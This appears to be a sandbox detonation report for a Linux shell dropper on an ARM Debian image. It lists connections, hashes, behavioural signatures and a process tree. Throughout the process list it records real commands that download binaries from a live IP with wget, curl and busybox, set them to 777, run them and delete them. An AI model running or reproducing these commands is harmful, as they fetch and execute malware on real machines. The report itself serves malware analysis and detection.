[/bin/busybox wget http://87.120.125.191/bins/VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx]

/bin/chmod

[chmod 777 VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx]

/tmp/VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx

[./VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx]

/bin/rm

[rm VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
US 151.101.1.91:443 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
GB 195.181.164.15:443 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
GB 185.125.188.62:443 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
GB 185.125.188.62:443 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp

Files

/tmp/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-21 01:00

Reported

2024-11-21 01:03

Platform

debian9-armhf-20240611-en

Max time kernel

30s

Max time network

57s

Command Line

[/tmp/59a56859b16d3d89334ed2d054cc2b5383bbb18ee44d9c24a8e963fcc747119d.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN /tmp/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN N/A
N/A /tmp/Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e /tmp/Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e N/A
N/A /tmp/pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc /tmp/pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc N/A
N/A /tmp/FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ /tmp/FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ N/A
N/A /tmp/ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy /tmp/ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy N/A
N/A /tmp/1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc /tmp/1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc N/A
N/A /tmp/VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx /tmp/VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx N/A
N/A /tmp/81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH /tmp/81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH N/A
N/A /tmp/FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3 /tmp/FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3 N/A
N/A /tmp/Bm41gwbeemewl88MTcw92QLt84X6ged9hk /tmp/Bm41gwbeemewl88MTcw92QLt84X6ged9hk N/A
N/A /tmp/kKiltJxtBfNkFAkv2yExmG347TjI20SHBO /tmp/kKiltJxtBfNkFAkv2yExmG347TjI20SHBO N/A
N/A /tmp/I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV /tmp/I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV N/A
N/A /tmp/IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi /tmp/IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi N/A
N/A /tmp/yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM /tmp/yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM N/A
N/A /tmp/I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV /tmp/I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV N/A
N/A /tmp/IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi /tmp/IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi N/A
N/A /tmp/yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM /tmp/yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM N/A
N/A /tmp/kKiltJxtBfNkFAkv2yExmG347TjI20SHBO /tmp/kKiltJxtBfNkFAkv2yExmG347TjI20SHBO N/A
N/A /tmp/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN /tmp/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN N/A
N/A /tmp/Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e /tmp/Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e N/A
N/A /tmp/pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc /tmp/pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc N/A
N/A /tmp/FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ /tmp/FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ N/A
N/A /tmp/ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy /tmp/ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy N/A
N/A /tmp/81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH /tmp/81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH N/A
N/A /tmp/FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3 /tmp/FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3 N/A
N/A /tmp/Bm41gwbeemewl88MTcw92QLt84X6ged9hk /tmp/Bm41gwbeemewl88MTcw92QLt84X6ged9hk N/A
N/A /tmp/1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc /tmp/1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc N/A
N/A /tmp/VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx /tmp/VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ /usr/bin/curl N/A
File opened for modification /tmp/Bm41gwbeemewl88MTcw92QLt84X6ged9hk /usr/bin/curl N/A
File opened for modification /tmp/pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc /usr/bin/curl N/A
File opened for modification /tmp/FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ /usr/bin/curl N/A
File opened for modification /tmp/81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH /usr/bin/curl N/A
File opened for modification /tmp/FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3 /usr/bin/curl N/A
File opened for modification /tmp/ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy /usr/bin/curl N/A
File opened for modification /tmp/Bm41gwbeemewl88MTcw92QLt84X6ged9hk /usr/bin/curl N/A
File opened for modification /tmp/I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV /usr/bin/curl N/A
File opened for modification /tmp/IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi /usr/bin/curl N/A
File opened for modification /tmp/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN /usr/bin/curl N/A
File opened for modification /tmp/1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc /usr/bin/curl N/A
File opened for modification /tmp/kKiltJxtBfNkFAkv2yExmG347TjI20SHBO /usr/bin/curl N/A
File opened for modification /tmp/1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc /usr/bin/curl N/A
File opened for modification /tmp/Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e /usr/bin/curl N/A
File opened for modification /tmp/yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM /usr/bin/curl N/A
File opened for modification /tmp/yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM /usr/bin/curl N/A
File opened for modification /tmp/ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy /usr/bin/curl N/A
File opened for modification /tmp/Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e /usr/bin/curl N/A
File opened for modification /tmp/pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc /usr/bin/curl N/A
File opened for modification /tmp/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN /usr/bin/curl N/A
File opened for modification /tmp/IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi /usr/bin/curl N/A
File opened for modification /tmp/81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH /usr/bin/curl N/A
File opened for modification /tmp/FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3 /usr/bin/curl N/A
File opened for modification /tmp/VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx /usr/bin/curl N/A
File opened for modification /tmp/kKiltJxtBfNkFAkv2yExmG347TjI20SHBO /usr/bin/curl N/A
File opened for modification /tmp/I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV /usr/bin/curl N/A
File opened for modification /tmp/VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx /usr/bin/curl N/A

Processes

/tmp/59a56859b16d3d89334ed2d054cc2b5383bbb18ee44d9c24a8e963fcc747119d.sh

[/tmp/59a56859b16d3d89334ed2d054cc2b5383bbb18ee44d9c24a8e963fcc747119d.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.125.191/bins/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN]

/bin/chmod

[chmod 777 YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN]

/tmp/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN

[./YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN]

/bin/rm

[rm YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN]

/usr/bin/wget

[wget http://87.120.125.191/bins/Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e]

/bin/chmod

[chmod 777 Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e]

/tmp/Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e

[./Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e]

/bin/rm

[rm Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e]

/usr/bin/wget

[wget http://87.120.125.191/bins/pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc]

/bin/chmod

[chmod 777 pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc]

/tmp/pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc

[./pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc]

/bin/rm

[rm pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc]

/usr/bin/wget

[wget http://87.120.125.191/bins/FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ]

/bin/chmod

[chmod 777 FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ]

/tmp/FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ

[./FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ]

/bin/rm

[rm FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ]

/usr/bin/wget

[wget http://87.120.125.191/bins/ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy]

/bin/chmod

[chmod 777 ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy]

/tmp/ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy

[./ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy]

/bin/rm

[rm ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy]

/usr/bin/wget

[wget http://87.120.125.191/bins/1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc]

/bin/chmod

[chmod 777 1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc]

/tmp/1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc

[./1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc]

/bin/rm

[rm 1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc]

/usr/bin/wget

[wget http://87.120.125.191/bins/VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx]

/bin/chmod

[chmod 777 VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx]

/tmp/VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx

[./VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx]

/bin/rm

[rm VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx]

/usr/bin/wget

[wget http://87.120.125.191/bins/81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH]

/bin/chmod

[chmod 777 81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH]

/tmp/81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH

[./81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH]

/bin/rm

[rm 81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH]

/usr/bin/wget

[wget http://87.120.125.191/bins/FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3]

/bin/chmod

[chmod 777 FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3]

/tmp/FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3

[./FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3]

/bin/rm

[rm FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3]

/usr/bin/wget

[wget http://87.120.125.191/bins/Bm41gwbeemewl88MTcw92QLt84X6ged9hk]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/Bm41gwbeemewl88MTcw92QLt84X6ged9hk]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/Bm41gwbeemewl88MTcw92QLt84X6ged9hk]

/bin/chmod

[chmod 777 Bm41gwbeemewl88MTcw92QLt84X6ged9hk]

/tmp/Bm41gwbeemewl88MTcw92QLt84X6ged9hk

[./Bm41gwbeemewl88MTcw92QLt84X6ged9hk]

/bin/rm

[rm Bm41gwbeemewl88MTcw92QLt84X6ged9hk]

/usr/bin/wget

[wget http://87.120.125.191/bins/kKiltJxtBfNkFAkv2yExmG347TjI20SHBO]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/kKiltJxtBfNkFAkv2yExmG347TjI20SHBO]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/kKiltJxtBfNkFAkv2yExmG347TjI20SHBO]

/bin/chmod

[chmod 777 kKiltJxtBfNkFAkv2yExmG347TjI20SHBO]

/tmp/kKiltJxtBfNkFAkv2yExmG347TjI20SHBO

[./kKiltJxtBfNkFAkv2yExmG347TjI20SHBO]

/bin/rm

[rm kKiltJxtBfNkFAkv2yExmG347TjI20SHBO]

/usr/bin/wget

[wget http://87.120.125.191/bins/I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV]

/bin/chmod

[chmod 777 I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV]

/tmp/I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV

[./I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV]

/bin/rm

[rm I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV]

/usr/bin/wget

[wget http://87.120.125.191/bins/IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi]

/bin/chmod

[chmod 777 IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi]

/tmp/IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi

[./IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi]

/bin/rm

[rm IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi]

/usr/bin/wget

[wget http://87.120.125.191/bins/yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM]

/bin/chmod

[chmod 777 yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM]

/tmp/yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM

[./yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM]

/bin/rm

[rm yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM]

/usr/bin/wget

[wget http://87.120.125.191/bins/I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV]

